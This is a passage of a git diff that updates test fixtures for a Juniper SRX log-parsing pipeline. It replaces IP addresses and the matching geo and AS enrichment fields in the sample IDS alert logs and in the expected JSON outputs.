"2021-12-09T13:40:54.977014300Z", + "original": "\u003c165\u003e1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@67.43.156.15 epoch-time=\"1319419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth1.O\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", "category": [ @@ -672,21 +670,21 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.30.20.201" }, "log": { "level": "notification" }, "destination": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.30.20.201" }, "rule": { "id": "1" }, "source": { "port": 50825, - "ip": "1.128.3.4" + "ip": "192.168.14.214" }, "juniper": { "srx": { @@ -739,18 +737,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1" + "192.168.14.214", + "172.30.20.201" ] }, "client": { "port": 50825, - "ip": "1.128.3.4" + "ip": "192.168.14.214" }, "event": { "severity": 165, - "ingested": "2021-11-25T09:37:26.894233105Z", - "original": "\u003c165\u003e1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.1.1.1.2.35 epoch-time=\"1419419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth3.0\" source-address=\"1.128.3.4\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.1\" destination-address=\"175.16.199.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS02\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", + "ingested": "2021-12-09T13:40:54.977018600Z", + "original": "\u003c165\u003e1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@67.43.156.15 epoch-time=\"1419419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth3.0\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.1\" destination-address=\"172.30.20.201\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS02\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", "category": [ diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log index 7da351f230a..906f671e386 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log @@ -1,12 +1,12 @@ -<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.137 attack-name="TCP sweep!" source-address="1.128.3.4" source-port="6000" destination-address="81.2.69.143" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"] -<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.36 attack-name="WinNuke attack!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" source-port="3240" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"] -<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" source-address="1.128.3.4" source-port="40001" destination-address="81.2.69.143" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.1.1.1.2.40 attack-name="UDP flood!" source-address="1.128.3.4" source-port="40001" destination-address="81.2.69.143" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.1.1.1.2.40 attack-name="ICMP fragment!" source-address="1.128.3.4" destination-address="81.2.69.143" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Record Route IP option!" source-address="1.128.3.4" destination-address="81.2.69.143" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Tunnel GRE 6in6!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-address="81.2.69.143" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Tunnel GRE 4in4!" source-address="1.128.3.4" destination-address="81.2.69.143" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" destination-address="1.128.3.4" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"] -<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" source-address="1.128.3.4" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"] -<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name="TCP port scan!" source-address="1.128.3.4" source-port="50630" destination-address="81.2.69.143" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"] -<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name="FIN but no ACK bit!" source-address="1.128.3.4" source-port="42799" destination-address="81.2.69.143" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="TCP sweep!" source-address="67.43.156.13" source-port="6000" destination-address="67.43.156.14" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"] +<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="WinNuke attack!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" source-port="3240" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"] +<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="SYN flood!" source-address="67.43.156.15" source-port="40001" destination-address="67.43.156.12" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@67.43.156.15 attack-name="UDP flood!" source-address="67.43.156.15" source-port="40001" destination-address="67.43.156.15" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@67.43.156.15 attack-name="ICMP fragment!" source-address="67.43.156.15" destination-address="67.43.156.15" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Record Route IP option!" source-address="67.43.156.15" destination-address="67.43.156.15" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Tunnel GRE 6in6!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Tunnel GRE 4in4!" source-address="67.43.156.13" destination-address="67.43.156.15" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@67.43.156.15 attack-name="SYN flood!" destination-address="67.43.156.12" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"] +<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@67.43.156.15 attack-name="SYN flood!" source-address="67.43.156.15" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"] +<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="TCP port scan!" source-address="10.1.1.100" source-port="50630" destination-address="10.1.1.1" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"] +<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="FIN but no ACK bit!" source-address="10.1.1.100" source-port="42799" destination-address="10.1.1.1" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"] diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log-expected.json index 023eb07c003..b28e0a37bae 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log-expected.json +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log-expected.json @@ -3,36 +3,42 @@ { "server": { "port": 1433, - "ip": "81.2.69.143" + "ip": "67.43.156.14" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 1433, - "ip": "81.2.69.143" + "ip": "67.43.156.14" }, "source": { - "port": 6000, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 6000, + "ip": "67.43.156.13" }, "juniper": { "srx": { @@ -63,18 +69,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.13", + "67.43.156.14" ] }, "client": { "port": 6000, - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341232637Z", - "original": "\u003c11\u003e1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.137 attack-name=\"TCP sweep!\" source-address=\"1.128.3.4\" source-port=\"6000\" destination-address=\"81.2.69.143\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920961700Z", + "original": "\u003c11\u003e1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP sweep!\" source-address=\"67.43.156.13\" source-port=\"6000\" destination-address=\"67.43.156.14\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", "kind": "alert", "action": "sweep_detected", "category": [ @@ -161,8 +167,8 @@ }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341252074Z", - "original": "\u003c11\u003e1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.36 attack-name=\"WinNuke attack!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" source-port=\"3240\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-port=\"139\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920973200Z", + "original": "\u003c11\u003e1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"WinNuke attack!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" source-port=\"3240\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-port=\"139\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", "kind": "alert", "action": "attack_detected", "category": [ @@ -180,36 +186,42 @@ { "server": { "port": 50010, - "ip": "81.2.69.143" + "ip": "67.43.156.12" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 50010, - "ip": "81.2.69.143" + "ip": "67.43.156.12" }, "source": { - "port": 40001, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 40001, + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -240,18 +252,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.15", + "67.43.156.12" ] }, "client": { "port": 40001, - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341256702Z", - "original": "\u003c11\u003e1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.40 attack-name=\"SYN flood!\" source-address=\"1.128.3.4\" source-port=\"40001\" destination-address=\"81.2.69.143\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920980800Z", + "original": "\u003c11\u003e1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=\"67.43.156.12\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -269,36 +281,42 @@ { "server": { "port": 53, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 53, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { - "port": 40001, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 40001, + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -329,18 +347,17 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.15" ] }, "client": { "port": 40001, - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341260449Z", - "original": "\u003c11\u003e1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.1.1.1.2.40 attack-name=\"UDP flood!\" source-address=\"1.128.3.4\" source-port=\"40001\" destination-address=\"81.2.69.143\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920986Z", + "original": "\u003c11\u003e1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@67.43.156.15 attack-name=\"UDP flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=\"67.43.156.15\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -357,34 +374,40 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -415,17 +438,16 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.15" ] }, "client": { - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341263956Z", - "original": "\u003c11\u003e1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.1.1.1.2.40 attack-name=\"ICMP fragment!\" source-address=\"1.128.3.4\" destination-address=\"81.2.69.143\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920991600Z", + "original": "\u003c11\u003e1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@67.43.156.15 attack-name=\"ICMP fragment!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "fragment_detected", "category": [ @@ -442,34 +464,40 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -503,17 +531,16 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.15" ] }, "client": { - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341267502Z", - "original": "\u003c11\u003e1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name=\"Record Route IP option!\" source-address=\"1.128.3.4\" destination-address=\"81.2.69.143\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920998Z", + "original": "\u003c11\u003e1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Record Route IP option!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "category": [ "network", @@ -529,7 +556,7 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "log": { "level": "error" @@ -537,17 +564,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "country_name": "Norway", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 10.0, + "lat": 62.0 + }, + "country_iso_code": "NO" }, - "ip": "81.2.69.143" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "geo": { @@ -593,8 +617,7 @@ }, "related": { "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "81.2.69.143" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "client": { @@ -602,8 +625,8 @@ }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341270408Z", - "original": "\u003c11\u003e1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name=\"Tunnel GRE 6in6!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-address=\"81.2.69.143\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.921004100Z", + "original": "\u003c11\u003e1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 6in6!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "tunneling_screen", "category": [ @@ -620,34 +643,40 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "juniper": { "srx": { @@ -681,17 +710,17 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.13", + "67.43.156.15" ] }, "client": { - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341273564Z", - "original": "\u003c11\u003e1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name=\"Tunnel GRE 4in4!\" source-address=\"1.128.3.4\" destination-address=\"81.2.69.143\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.921008600Z", + "original": "\u003c11\u003e1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 4in4!\" source-address=\"67.43.156.13\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "tunneling_screen", "category": [ @@ -708,7 +737,7 @@ }, { "server": { - "ip": "1.128.3.4" + "ip": "67.43.156.12" }, "observer": { "name": "rtr199", @@ -728,20 +757,26 @@ }, "related": { "ip": [ - "1.128.3.4" + "67.43.156.12" ] }, "log": { "level": "error" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "ip": "67.43.156.12" }, "juniper": { "srx": { @@ -753,8 +788,8 @@ }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341276670Z", - "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.1.1.1.2.40 attack-name=\"SYN flood!\" destination-address=\"1.128.3.4\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", + "ingested": "2021-12-10T10:16:16.921014200Z", + "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" destination-address=\"67.43.156.12\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -791,23 +826,29 @@ }, "related": { "ip": [ - "1.128.3.4" + "67.43.156.15" ] }, "log": { "level": "error" }, "client": { - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -819,8 +860,8 @@ }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341279695Z", - "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.1.1.1.2.40 attack-name=\"SYN flood!\" source-address=\"1.128.3.4\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", + "ingested": "2021-12-10T10:16:16.921018700Z", + "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -841,36 +882,18 @@ { "server": { "port": 10778, - "ip": "81.2.69.143" + "ip": "10.1.1.1" }, "log": { "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", - "location": { - "lon": -0.0931, - "lat": 51.5142 - } - }, "port": 10778, - "ip": "81.2.69.143" + "ip": "10.1.1.1" }, "source": { 